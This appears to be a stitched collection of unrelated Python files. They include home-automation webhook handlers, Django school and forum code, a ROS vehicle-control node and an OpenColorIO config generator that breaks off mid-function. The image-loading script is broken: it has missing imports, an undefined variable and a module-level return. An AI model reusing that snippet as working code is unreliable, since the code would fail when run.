identifiers={(DOMAIN, config_entry.data[ATTR_DEVICE_ID])},
manufacturer=new_registration[ATTR_MANUFACTURER],
model=new_registration[ATTR_MODEL],
name=new_registration[ATTR_DEVICE_NAME],
sw_version=new_registration[ATTR_OS_VERSION],
)
opp.config_entries.async_update_entry(config_entry, data=new_registration)
return webhook_response(
safe_registration(new_registration),
registration=new_registration,
)
@WEBHOOK_COMMANDS.register("enable_encryption")
async def webhook_enable_encryption(opp, config_entry, data):
"""Handle a encryption enable webhook."""
if config_entry.data[ATTR_SUPPORTS_ENCRYPTION]:
_LOGGER.warning(
"Refusing to enable encryption for %s because it is already enabled!",
config_entry.data[ATTR_DEVICE_NAME],
)
return error_response(
ERR_ENCRYPTION_ALREADY_ENABLED, "Encryption already enabled"
)
if not supports_encryption():
_LOGGER.warning(
"Unable to enable encryption for %s because libsodium is unavailable!",
config_entry.data[ATTR_DEVICE_NAME],
)
return error_response(ERR_ENCRYPTION_NOT_AVAILABLE, "Encryption is unavailable")
secret = secrets.token_hex(SecretBox.KEY_SIZE)
data = {**config_entry.data, ATTR_SUPPORTS_ENCRYPTION: True, CONF_SECRET: secret}
opp.config_entries.async_update_entry(config_entry, data=data)
return json_response({"secret": secret})
@WEBHOOK_COMMANDS.register("register_sensor")
@validate_schema(
{
vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict,
vol.Optional(ATTR_SENSOR_DEVICE_CLASS): vol.All(
vol.Lower, vol.In(COMBINED_CLASSES)
),
vol.Required(ATTR_SENSOR_NAME): cv.string,
vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES),
vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string,
vol.Optional(ATTR_SENSOR_UOM): cv.string,
vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float),
vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon,
}
)
async def webhook_register_sensor(opp, config_entry, data):
"""Handle a register sensor webhook."""
entity_type = data[ATTR_SENSOR_TYPE]
unique_id = data[ATTR_SENSOR_UNIQUE_ID]
unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}"
if unique_store_key in opp.data[DOMAIN][entity_type]:
_LOGGER.error("Refusing to re-register existing sensor %s!", unique_id)
return error_response(
ERR_SENSOR_DUPLICATE_UNIQUE_ID,
f"{entity_type} {unique_id} already exists!",
status=409,
)
data[CONF_WEBHOOK_ID] = config_entry.data[CONF_WEBHOOK_ID]
opp.data[DOMAIN][entity_type][unique_store_key] = data
try:
await opp.data[DOMAIN][DATA_STORE].async_save(savable_state(opp))
except OpenPeerPowerError as ex:
_LOGGER.error("Error registering sensor: %s", ex)
return empty_okay_response()
register_signal = "{}_{}_register".format(DOMAIN, data[ATTR_SENSOR_TYPE])
async_dispatcher_send(opp, register_signal, data)
return webhook_response(
{"success": True},
registration=config_entry.data,
status=HTTP_CREATED,
)
@WEBHOOK_COMMANDS.register("update_sensor_states")
@validate_schema(
vol.All(
cv.ensure_list,
[
vol.Schema(
{
vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict,
vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon,
vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float),
vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES),
vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string,
}
)
],
)
)
async def webhook_update_sensor_states(opp, config_entry, data):
"""Handle an update sensor states webhook."""
resp = {}
for sensor in data:
entity_type = sensor[ATTR_SENSOR_TYPE]
unique_id = sensor[ATTR_SENSOR_UNIQUE_ID]
unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}"
if unique_store_key not in opp.data[DOMAIN][entity_type]:
_LOGGER.error(
"Refusing to update non-registered sensor: %s", unique_store_key
)
err_msg = f"{entity_type} {unique_id} is not registered"
resp[unique_id] = {
"success": False,
"error": {"code": ERR_SENSOR_NOT_REGISTERED, "message": err_msg},
}
continue
entry = opp.data[DOMAIN][entity_type][unique_store_key]
new_state = {**entry, **sensor}
opp.data[DOMAIN][entity_type][unique_store_key] = new_state
safe = savable_state(opp)
try:
await opp.data[DOMAIN][DATA_STORE].async_save(safe)
except OpenPeerPowerError as ex:
_LOGGER.error("Error updating mobile_app registration: %s", ex)
return empty_okay_response()
async_dispatcher_send(opp, SIGNAL_SENSOR_UPDATE, new_state)
resp[unique_id] = {"success": True}
return webhook_response(resp, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("get_zones")
async def webhook_get_zones(opp, config_entry, data):
"""Handle a get zones webhook."""
zones = [
opp.states.get(entity_id)
for entity_id in sorted(opp.states.async_entity_ids(ZONE_DOMAIN))
]
return webhook_response(zones, registration=config_entry.data)
@WEBHOOK_COMMANDS.register("get_config")
async def webhook_get_config(opp, config_entry, data):
"""Handle a get config webhook."""
opp_config = opp.config.as_dict()
resp = {
"latitude": opp_config["latitude"],
"longitude": opp_config["longitude"],
"elevation": opp_config["elevation"],
"unit_system": opp_config["unit_system"],
"location_name": opp_config["location_name"],
"time_zone": opp_config["time_zone"],
"components": opp_config["components"],
"version": opp_config["version"],
"theme_color": MANIFEST_JSON["theme_color"],
}
if CONF_CLOUDHOOK_URL in config_entry.data:
resp[CONF_CLOUDHOOK_URL] = config_entry.data[CONF_CLOUDHOOK_URL]
try:
resp[CONF_REMOTE_UI_URL] = opp.components.cloud.async_remote_ui_url()
except opp.components.cloud.CloudNotAvailable:
pass
return webhook_response(resp, registration=config_entry.data)
|
from django.db import models
from django.contrib.auth.models import User
from django.db.models.signals import post_save
from django.dispatch import receiver
#------- Profile, Student, Teacher Model -------
## TODO Refactor CharField To Text Field Modify HTMl maxlength. WRONG USAGE!!! ALLL WRONG
class Profile(models.Model):
#username,first,last,email,password is extened from Django Auth User
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL)
street_address = models.CharField(max_length=200, blank=True)
city = models.CharField(max_length=100, blank=True)
state = models.CharField(max_length=100, blank=True)
zip_code = models.CharField(max_length=20, blank=True)
phone_number = models.CharField(max_length=20, blank=True)
emergency_contact = models.CharField(max_length=20, blank=True)
relationship = models.CharField(max_length=100, blank=True)
middle_name = models.CharField(max_length=50, blank=True)
birth_date = models.DateField(null=True, blank=True)
school_id = models.CharField(max_length=15,null=True, blank = True, default=0)
is_student = models.BooleanField('Student', default=False)
is_teacher = models.BooleanField('Teacher', default=False)
about = models.TextField(max_length=300, blank=True)
hobby = models.TextField(max_length=100, blank=True)
favorite_food = models.TextField(max_length=100, blank=True)
favorite_subject = models.TextField(max_length=100, blank=True)
def __str__(self):
if self.user == None:
return 'User deleted - ' + str(self.school_id)
else:
return self.user.get_full_name()
@receiver(post_save, sender=User)# Create a Profile when a User is create.
def create_profile_object(sender, instance, created, **kwargs):
if created:
profile = Profile.objects.create(user=instance)
class Student(models.Model):
profile = models.OneToOneField(Profile, null=True, on_delete = models.SET_NULL)
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL)
# Course_taking = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL, related_name='enrolled_Course')
# classroom_taking = models.ManyToManyField('Classroom',blank=True)
def __str__(self):
return 'Student: ' + str(self.user.get_full_name()) #change to string
class Teacher(models.Model):
profile = models.OneToOneField(Profile,null=True, on_delete = models.SET_NULL)
user = models.OneToOneField(User, null=True, on_delete = models.SET_NULL, related_name='teacher')
def __str__(self):
return 'Teacher: ' + str(self.user.get_full_name()) #change to string
# --------------- Course, Classroom, Lesson Plan and Department's Model----------------------
class Course(models.Model):
course_number = models.CharField(max_length=20,default='12345678')
abbreviated_title = models.CharField(max_length=150,default='')
course_title = models.CharField(max_length=250,default='') #,unique=True)
maximum_credit = models.CharField(max_length=10,default='')
semester = models.CharField(max_length=50,default='')
year = models.CharField(max_length=4,default='')
teacher_name = models.CharField(max_length=50,default='')
description = models.CharField(max_length=450,default='')
#Alert If related name is use in ForeignKey, _set cannot be use!
is_archive = models.BooleanField(default=False)
department = models.ForeignKey('Department',blank=True, null=True, on_delete = models.SET_NULL, related_name='belong_in_department')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL, related_name='course_by_teacher')
create_date = models.DateField(auto_now_add=True , blank=True,null=True,)
# A Course is bound to the teacher and create a classroom upon creation. More room can be added later
class Lesson_plan(models.Model):
course_title = models.CharField(max_length=50,default='')
teacher_idx = models.CharField(max_length=10,default='')
week_number = models.CharField(max_length=10,default='')
agenda = models.CharField(max_length=450,default='Agenda Goes Here')
monday_date = models.DateField(blank=True, null=True)
tuesday_date = models.DateField(blank=True, null=True)
wednesday_date = models.DateField(blank=True, null=True)
thursday_date = models.DateField(blank=True, null=True)
friday_date= models.DateField(blank=True, null=True)
monday_assignment = models.CharField(max_length=400,default='a')
tuesday_assignment= models.CharField(max_length=400,default='s')
wednesday_assignment= models.CharField(max_length=400,default='d')
thursday_assignment= models.CharField(max_length=400,default='f')
friday_assignment= models.CharField(max_length=400,default='g')
weekend_assignment = models.CharField(max_length=300,default='h')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL)
course = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL)
last_modifield = models.DateTimeField(auto_now=True, blank=True,null=True,)
create_date = models.DateField(auto_now_add=True, blank=True,null=True,)
def __str__(self):
return 'Lesson plan for '+self.course_title +' Teacher: '+ str(self.teacher)
class Classroom(models.Model):
course_title = models.CharField(max_length=50,default='')
course_number = models.CharField(max_length=20,default='')
teacher_name = models.CharField(max_length=50,default='')
teacher_idx = models.CharField(max_length=10,default='')
room_number = models.CharField(max_length=10,default='TBA')
time = models.TimeField(blank=True,null=True)
description = models.CharField(max_length=300,default='TBA')
# Use for statement to get value
# Course = models.ManyToManyField(Course, blank=True)
is_archive = models.BooleanField(default=False)
semester = models.CharField(max_length=50,default='')
year = models.CharField(max_length=4,default='')
teacher = models.ForeignKey('Teacher',blank=True, null=True, on_delete = models.SET_NULL, related_name='classroom_by_teacher')
course = models.ForeignKey('Course',blank=True, null=True, on_delete = models.SET_NULL, related_name='course_in_classroom')
student = models.ManyToManyField(Student, blank=True)
def __str__(self):
return 'Course: ' + self.course_title +' Room #: '+self.room_number
@receiver(post_save, sender=Course)
def create_classroom_object(sender, instance, created, **kwargs):
if created:
classroom = Classroom.objects.create(course_title=instance.course_title,course_id=instance.id, teacher_name=instance.teacher_name,
course=instance,teacher=instance.teacher,semester=instance.semester,year=instance.year)
# To Find the Classroom:
# teacher = Teacher.objects.filter(user=request.user)
# Course = Course.objects.filter(teacher_set=teacher, name ='Course_name')
# classroom = Classroom.objects.filter(teacher=teacher).filter(Course=Course)
class Department(models.Model):
description = models.CharField(max_length=450,default='Department Description')
name = models.CharField(max_length=75,default='', unique=True)
# Course = models.ManyToManyField('Course',blank=True)
teacher = models.ManyToManyField(Teacher,blank=True)
student = models.ManyToManyField(Student,blank=True)
def __str__(self):
return 'LC High School ' + self.name + ' department.'
|
import _plotly_utils.basevalidators
class YValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self,
plotly_name='y',
parent_name='scattergeo.marker.colorbar',
**kwargs
):
super(YValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
max=3,
min=-2,
role='style',
**kwargs
)
|
import sys
import tensorflow as tf
import numpy as np
import pydicom
from PIL import Image
import weights
#takes the root folder path and returns a list of pictures
def collect_pictures(path):
pic_list = []
full_path_list = []
for dirName, subdirList, fileList in os.walk(path):
# print('test')
for filename in file_list:
if ".png" in filename.lower() or ".jpg" in filename.lower():
full_path_list.append(os.path.join(dirName,filename))
for im in full_path_list:
pic_list.append(imageio.imread(im))
return pic_list
#takes a list of pictures and returns a list of matrices
def flip_to_mat(images):
matrix_list = []
for im in images:
arr = np.array(im)
arr = arr.reshape(1, -1)
matrix_list.append(arr)
return matrix_list
if __name__ == "__main__":
return flip_to_mat(collect_pictures(sys.argv[1]))
|
from ibis.backends.pandas.execution.arrays import * # noqa: F401,F403
from ibis.backends.pandas.execution.decimal import * # noqa: F401,F403
from ibis.backends.pandas.execution.generic import * # noqa: F401,F403
from ibis.backends.pandas.execution.join import * # noqa: F401,F403
from ibis.backends.pandas.execution.maps import * # noqa: F401,F403
from ibis.backends.pandas.execution.selection import * # noqa: F401,F403
from ibis.backends.pandas.execution.strings import * # noqa: F401,F403
from ibis.backends.pandas.execution.structs import * # noqa: F401,F403
from ibis.backends.pandas.execution.temporal import * # noqa: F401,F403
from ibis.backends.pandas.execution.timecontext import * # noqa: F401,F403
from ibis.backends.pandas.execution.window import * # noqa: F401,F403
|
import logging
import os
import platform
import shutil
import sys
from pathlib import Path
logger = logging.getLogger(__name__)
def ensure_wkhtmltopdf(): # pragma: no cover
if shutil.which("wkhtmltopdf") is None:
if platform.system() == "Windows":
wkhtmltopdf_path = _find_wkhtmltopdf_path()
if wkhtmltopdf_path and wkhtmltopdf_path.exists():
logger.debug(f"Found wkhtmltopdf at {wkhtmltopdf_path}")
os.environ["PATH"] += os.pathsep + str(wkhtmltopdf_path.parent)
return
logger.error("You need to install wkhtmltopdf to use --mode-webclips=PDF")
sys.exit(1)
def _find_wkhtmltopdf_path(): # pragma: no cover
import winreg # noqa: WPS433
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r"SOFTWARE\wkhtmltopdf") as key:
return Path(winreg.QueryValueEx(key, "PdfPath")[0])
except FileNotFoundError:
return None
|
from django.shortcuts import redirect
from django.shortcuts import render
from django.core.paginator import Paginator
from django.contrib.auth.decorators import login_required
from article.forms import ArticleForm
from article.models import Article
from block.models import Block
from comment.models import Comment
def article_list(request, block_id):
ARTICLE_CNT_1PAGE = 1
page_no = int(request.GET.get("page_no", "1"))
block_id = int(block_id)
block = Block.objects.get(id=block_id)
articles_objs = Article.objects.filter(block=block, status=0).order_by("-id")
page_articles, pagination_data = paginate_queryset(articles_objs, page_no, ARTICLE_CNT_1PAGE)
return render(request, "article_list.html", {"articles": page_articles, "b": block,
"pagination_data": pagination_data})
def paginate_queryset(objs, page_no, cnt_per_page=10, half_show_length=5):
p = Paginator(objs, cnt_per_page)
if page_no > p.num_pages:
page_no = p.num_pages
if page_no <= 0:
page_no = 1
page_links = [i for i in range(page_no - half_show_length, page_no + half_show_length + 1)
if i > 0 and i <= p.num_pages]
page = p.page(page_no)
previous_link = page_links[0] - 1
next_link = page_links[-1] + 1
pagination_data = {"page_cnt": p.num_pages,
"page_no": page_no,
"page_links": page_links,
"previous_link": previous_link,
"next_link": next_link,
"has_previous": previous_link > 0,
"has_next": next_link <= p.num_pages}
return (page.object_list, pagination_data)
@login_required
def article_create(request, block_id):
block_id = int(block_id)
block = Block.objects.get(id=block_id)
if request.method == "GET":
return render(request, "article_create.html", {"b": block})
else:
form = ArticleForm(request.POST)
if form.is_valid():
article = form.save(commit=False)
article.owner = request.user
article.block = block
article.status = 0
article.save()
return redirect("/article/list/%s" % block_id)
else:
return render(request, "article_create.html", {"b": block, "form": form})
def article_detail(request, article_id):
page_no = int(request.GET.get("page_no", "1"))
article_id = int(article_id)
article = Article.objects.get(id=article_id)
comments = Comment.objects.filter(article=article).order_by("-id")
page_comments, pagination_data = paginate_queryset(comments, page_no, 2)
return render(request, "article_detail.html", {"article": article,
"comments": page_comments,
"pagination_data": pagination_data})
|
#!/usr/bin/env python
# import cte_calculator
from geometry_msgs.msg import PoseStamped
import rospy
from std_msgs.msg import Bool
from styx_msgs.msg import Lane
from dbw_mkz_msgs.msg import ThrottleCmd, SteeringCmd, BrakeCmd, SteeringReport
from geometry_msgs.msg import TwistStamped
import math
from twist_controller import Controller
'''
You can build this node only after you have built (or partially built) the `waypoint_updater` node.
You will subscribe to `/twist_cmd` message which provides the proposed linear and angular velocities.
You can subscribe to any other message that you find important or refer to the document for list
of messages subscribed to by the reference implementation of this node.
One thing to keep in mind while building this node and the `twist_controller` class is the status
of `dbw_enabled`. While in the simulator, its enabled all the time, in the real car, that will
not be the case. This may cause your PID controller to accumulate error because the car could
temporarily be driven by a human instead of your controller.
We have provided two launch files with this node. Vehicle specific values (like vehicle_mass,
wheel_base) etc should not be altered in tbhese files.
We have also provided some reference implementations for PID controller and other utility classes.
You are free to use them or build your own.
Once you have the proposed throttle, brake, and steer values, publish it on the various publishers
that we have created in the `__init__` function.
'''
class DBWNode(object):
def __init__(self):
rospy.init_node('dbw_node')
vehicle_mass = rospy.get_param('~vehicle_mass', 1736.35)
fuel_capacity = rospy.get_param('~fuel_capacity', 13.5)
brake_deadband = rospy.get_param('~brake_deadband', .1)
decel_limit = rospy.get_param('~decel_limit', -5)
accel_limit = rospy.get_param('~accel_limit', 1.)
wheel_radius = rospy.get_param('~wheel_radius', 0.2413)
wheel_base = rospy.get_param('~wheel_base', 2.8498)
steer_ratio = rospy.get_param('~steer_ratio', 14.8)
max_lat_accel = rospy.get_param('~max_lat_accel', 3.)
max_steer_angle = rospy.get_param('~max_steer_angle', 8.)
self.steer_pub = rospy.Publisher('/vehicle/steering_cmd',
SteeringCmd, queue_size=1)
self.throttle_pub = rospy.Publisher('/vehicle/throttle_cmd',
ThrottleCmd, queue_size=1)
self.brake_pub = rospy.Publisher('/vehicle/brake_cmd',
BrakeCmd, queue_size=1)
# Subscribe to all the topics you need to
# rospy.Subscriber('/subscriber message name', variable type, callback function, queue_size=1)
self.twist_sub = rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb, queue_size=1)
self.velocity_sub = rospy.Subscriber('/current_vel', TwistStamped, self.current_msg_cb, queue_size=1)
self.dbw_sub = rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb, queue_size=1)
self.final_wp_sub = rospy.Subscriber('final_waypoints', Lane, self.final_waypoints_cb, queue_size=1)
self.pose_sub = rospy.Subscriber('/current_pose', PoseStamped, self.current_pose_cb, queue_size=1)
# TODO: Create `Controller` object
self.controller = Controller(vehicle_mass=vehicle_mass,
fuel_capacity = fuel_capacity,
brake_deadband = brake_deadband,
decel_limit = decel_limit,
accel_limit = accel_limit,
wheel_radius = wheel_radius,
wheel_base = wheel_base,
steer_ratio = steer_ratio,
max_lat_accel = max_lat_accel,
max_steer_angle = max_steer_angle)
# self.controller = Controller(<Arguments you wish to provide>)
# TODO: Subscribe to all the topics you need to
rospy.Subscriber('/vehicle/dbw_enabled', Bool, self.dbw_enabled_cb)
rospy.Subscriber('/twist_cmd', TwistStamped, self.twist_cb)
rospy.Subscriber('/current_velocity',TwistStamped,self.velocity_cb)
self.current_vel = None
self.curr_ang_vel = None
self.dbw_enabled = None
self.linear_vel = None
self.angular_vel = None
self.throttle = self.steering = self.brake = 0
self.loop()
def loop(self):
rate = rospy.Rate(50) # 50Hz
while not rospy.is_shutdown():
# Get predicted throttle, brake, and steering using `twist_controller`
# You should only publish the control commands if dbw is enabled
# throttle, brake, steering = self.controller.control(<proposed linear velocity>,
# <proposed angular velocity>,
# <current linear velocity>,
# <dbw status>,
# <any other argument you need>)
# if <dbw is enabled>:
# self.publish(throttle, brake, steer)
if not None in (self.current_vel, self.linear_vel, self.angular_vel):
self.throttle, self.brake, self.steering = self.controller.control(
self.current_vel,
self.dbw_enabled,
self.linear_vel,
self.angular_vel)
if self.dbw_enabled:
self.publish(self.throttle, self.brake, self.steering)
rate.sleep()
def dbw_enabled_cb(self, msg):
self.dbw_enabled = msg
def twist_cb(self, msg):
self.linear_vel = msg.twist.linear.x
self.angular_vel = msg.twist.angular.z
def velocity_cb(self, msg):
self.current_vel = msg.twist.linear.x
def publish(self, throttle, brake, steer):
tcmd = ThrottleCmd()
tcmd.enable = True
tcmd.pedal_cmd_type = ThrottleCmd.CMD_PERCENT
tcmd.pedal_cmd = throttle
self.throttle_pub.publish(tcmd)
scmd = SteeringCmd()
scmd.enable = True
scmd.steering_wheel_angle_cmd = steer
self.steer_pub.publish(scmd)
bcmd = BrakeCmd()
bcmd.enable = True
bcmd.pedal_cmd_type = BrakeCmd.CMD_TORQUE
bcmd.pedal_cmd = brake
self.brake_pub.publish(bcmd)
def current_msg_cb(self, message):
self.current_vel = message.twist.linear.x
def final_waypoints_cb(self, message):
self.final_waypoints = message.waypoints
def current_pose_cb(self, message):
self.current_pose = message
if __name__ == '__main__':
DBWNode()
|
# SPDX-License-Identifier: BSD-3-Clause
# Copyright Contributors to the OpenColorIO Project.
"""
*aces-dev* Reference Config Generator
=====================================
Defines various objects related to the generation of the *aces-dev* reference
*OpenColorIO* config:
- :func:`opencolorio_config_aces.generate_config_aces`
"""
import csv
import logging
import re
from collections import defaultdict
from datetime import datetime
from enum import Flag, auto
from pathlib import Path
from opencolorio_config_aces.config.generation import (
ConfigData, colorspace_factory, generate_config, look_factory,
view_transform_factory)
from opencolorio_config_aces.config.reference import (
classify_aces_ctl_transforms, discover_aces_ctl_transforms,
unclassify_ctl_transforms)
from opencolorio_config_aces.utilities import git_describe, required
__author__ = 'OpenColorIO Contributors'
__copyright__ = 'Copyright Contributors to the OpenColorIO Project.'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'OpenColorIO Contributors'
__email__ = 'ocio-dev@lists.aswf.io'
__status__ = 'Production'
__all__ = [
'ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH',
'ACES_CONFIG_REFERENCE_COLORSPACE',
'ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE',
'ACES_CONFIG_COLORSPACE_NAME_SEPARATOR',
'ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR',
'ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR',
'ACES_CONFIG_DISPLAY_FAMILY', 'COLORSPACE_NAME_SUBSTITUTION_PATTERNS',
'LOOK_NAME_SUBSTITUTION_PATTERNS',
'TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS',
'VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS',
'DISPLAY_NAME_SUBSTITUTION_PATTERNS', 'ColorspaceDescriptionStyle',
'beautify_name', 'beautify_colorspace_name', 'beautify_look_name',
'beautify_transform_family', 'beautify_view_transform_name',
'beautify_display_name', 'ctl_transform_to_colorspace_name',
'ctl_transform_to_look_name', 'ctl_transform_to_transform_family',
'ctl_transform_to_description', 'ctl_transform_to_colorspace',
'ctl_transform_to_look', 'create_builtin_transform',
'style_to_view_transform', 'style_to_display_colorspace',
'generate_config_aces'
]
ACES_CONFIG_REFERENCE_MAPPING_FILE_PATH = (
Path(__file__).parents[0] / 'resources' /
'OpenColorIO-ACES-Config Transforms - Reference Config - Mapping.csv')
"""
Path to the *ACES* *CTL* transforms to *OpenColorIO* colorspaces mapping file.
CONFIG_MAPPING_FILE_PATH : unicode
"""
ACES_CONFIG_REFERENCE_COLORSPACE = 'ACES2065-1'
"""
*OpenColorIO* config reference colorspace.
ACES_CONFIG_REFERENCE_COLORSPACE : unicode
"""
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE = 'OCES'
"""
*OpenColorIO* config output encoding colorspace.
ACES_CONFIG_OUTPUT_ENCODING_COLORSPACE : unicode
"""
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR = ' - '
"""
*OpenColorIO* config colorspace name separator.
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR : unicode
"""
ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR = '/'
"""
*OpenColorIO* config colorspace family separator.
ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR : unicode
"""
ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR = '_to_'
"""
*OpenColorIO* config *BuiltinTransform* name separator.
ACES_CONFIG_BUILTIN_TRANSFORM_NAME_SEPARATOR : unicode
"""
ACES_CONFIG_DISPLAY_FAMILY = 'Display'
"""
*OpenColorIO* config display family.
ACES_CONFIG_DISPLAY_FAMILY : unicode
"""
COLORSPACE_NAME_SUBSTITUTION_PATTERNS = {
'ACES_0_1_1': 'ACES 0.1.1',
'ACES_0_2_2': 'ACES 0.2.2',
'ACES_0_7_1': 'ACES 0.7.1',
'_7nits': '',
'_15nits': '',
'_': ' ',
'-raw': '',
'-': ' ',
'\\b(\\w+)limited\\b': '(\\1 Limited)',
'\\b(\\d+)nits\\b': '(\\1 nits)',
'RGBmonitor': 'sRGB',
'Rec709': 'Rec. 709',
'Rec2020': 'Rec. 2020',
}
"""
*OpenColorIO* colorspace name substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
COLORSPACE_NAME_SUBSTITUTION_PATTERNS : dict
"""
COLORSPACE_NAME_SUBSTITUTION_PATTERNS.update({
# Input transforms also use the "family" name and thus need beautifying.
(f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}Alexa'
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}v\\d+'
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}.*'):
'',
f'{ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR}':
ACES_CONFIG_COLORSPACE_NAME_SEPARATOR,
})
LOOK_NAME_SUBSTITUTION_PATTERNS = {
# TODO: Implement support for callable patterns.
# The following one should be a dedicated definition/callable.
'BlueLightArtifactFix': 'Blue Light Artifact Fix'
}
"""
*OpenColorIO* look name substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
LOOK_NAME_SUBSTITUTION_PATTERNS : dict
"""
TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS = {
'\\\\': ACES_CONFIG_COLORSPACE_FAMILY_SEPARATOR,
'vendorSupplied[/\\\\]': '',
'arri': 'ARRI',
'alexa': 'Alexa',
'canon': 'Canon',
'panasonic': 'Panasonic',
'red': 'RED',
'sony': 'Sony',
}
"""
*OpenColorIO* transform family substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS : dict
"""
VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS = {
'7.2nit': '&',
'15nit': '&',
'lim': ' lim',
'nit': ' nits',
'sim': ' sim on',
'CINEMA': 'Cinema',
'VIDEO': 'Video',
'REC1886': 'Rec.1886',
'REC709': 'Rec.709',
'REC2020': 'Rec.2020',
'-': ' ',
}
"""
*OpenColorIO* view transform name substitution patterns.
VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS : dict
"""
DISPLAY_NAME_SUBSTITUTION_PATTERNS = {
'G2.6-': '',
'-BFD': '',
'REC.1886': 'Rec.1886',
'REC.709': 'Rec.709 Video',
'REC.2020': 'Rec.2020 Video',
'REC.2100': 'Rec.2100',
'-Rec.': ' / Rec.',
'-1000nit': '',
# Legacy Substitutions
'dcdm': 'DCDM',
'p3': 'P3',
'rec709': 'Rec. 709',
'rec2020': 'Rec. 2020',
}
"""
*OpenColorIO* display name substitution patterns.
Notes
-----
- The substitutions are evaluated in order.
DISPLAY_NAME_SUBSTITUTION_PATTERNS : dict
"""
class ColorspaceDescriptionStyle(Flag):
"""
Enum storing the various *OpenColorIO* colorspace description styles.
"""
NONE = auto()
ACES = auto()
OPENCOLORIO = auto()
SHORT = auto()
LONG = auto()
SHORT_UNION = ACES | OPENCOLORIO | SHORT
LONG_UNION = ACES | OPENCOLORIO | LONG
def beautify_name(name, patterns):
"""
Beautifies given name by applying in succession the given patterns.
Parameters
----------
name : unicode
Name to beautify.
patterns : dict
Dictionary of regular expression patterns and substitution to apply
onto the name.
Returns
-------
unicode
Beautified name.
Examples
--------
>>> beautify_name(
... 'Rec709_100nits_dim',
... COLORSPACE_NAME_SUBSTITUTION_PATTERNS)
'Rec. 709 (100 nits) dim'
"""
for pattern, substitution in patterns.items():
name = re.sub(pattern, substitution, name)
return name.strip()
def beautify_colorspace_name(name):
"""
Beautifies given *OpenColorIO* colorspace name by applying in succession
the relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* colorspace name to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* colorspace name.
Examples
--------
>>> beautify_colorspace_name('Rec709_100nits_dim')
'Rec. 709 (100 nits) dim'
"""
return beautify_name(name, COLORSPACE_NAME_SUBSTITUTION_PATTERNS)
def beautify_look_name(name):
"""
Beautifies given *OpenColorIO* look name by applying in succession the
relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* look name to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* look name.
Examples
--------
>>> beautify_look_name('BlueLightArtifactFix')
'Blue Light Artifact Fix'
"""
return beautify_name(name, LOOK_NAME_SUBSTITUTION_PATTERNS)
def beautify_transform_family(name):
"""
Beautifies given *OpenColorIO* colorspace family by applying in succession
the relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* colorspace family to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* colorspace family.
Examples
--------
>>> beautify_transform_family('vendorSupplied/arri/alexa/v3/EI800')
'ARRI/Alexa/v3/EI800'
"""
return beautify_name(name, TRANSFORM_FAMILY_SUBSTITUTION_PATTERNS)
def beautify_view_transform_name(name):
"""
Beautifies given *OpenColorIO* view transform name by applying in
succession the relevant patterns.
Parameters
----------
name : unicode
*OpenColorIO* view transform name to beautify.
Returns
-------
unicode
Beautified *OpenColorIO* view transform name.
Examples
--------
>>> beautify_view_transform_name(
... 'ACES-OUTPUT - ACES2065-1_to_CIE-XYZ-D65 - SDR-CINEMA_1.0')
'Output - SDR Cinema - ACES 1.0'
"""
basename, version = name.split(ACES_CONFIG_COLORSPACE_NAME_SEPARATOR)[
-1].split('_')
tokens = basename.split('-')
family, genus = (['-'.join(tokens[:2]), '-'.join(tokens[2:])]
if len(tokens) > 2 else [basename, None])
family = beautify_name(family, VIEW_TRANSFORM_NAME_SUBSTITUTION_PATTERNS)
